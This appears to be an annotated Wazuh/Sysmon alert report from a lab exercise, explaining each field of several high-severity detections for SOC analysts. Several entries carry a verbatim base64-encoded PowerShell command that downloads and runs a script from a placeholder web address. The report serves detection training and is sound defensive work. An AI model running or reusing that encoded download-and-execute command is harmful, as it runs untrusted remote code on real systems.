Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.923473
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:42.1700560Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282122
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:40.387 ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ProcessId: 8756 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ParentProcessId: 12600 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:40.387
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.045+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.045+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.931539
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:42.3980110Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282123
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:42.368 ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ProcessId: 8756 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_p2lp1iym.vuq.ps1 CreationUtcTime: 2025-04-24 22:35:42.368 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:42.368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_p2lp1iym.vuq.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:42.368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.717+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.717+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.934303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:44.7172103Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282169
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:43.049 ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ProcessId: 11892 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ParentProcessId: 8756 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:43.049
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.721+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.721+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.942369
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:44.8784134Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282170
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:44.876 ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ProcessId: 11892 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yefpwlal.rop.ps1 CreationUtcTime: 2025-04-24 22:35:44.876 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:44.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yefpwlal.rop.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:44.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.085+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.085+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
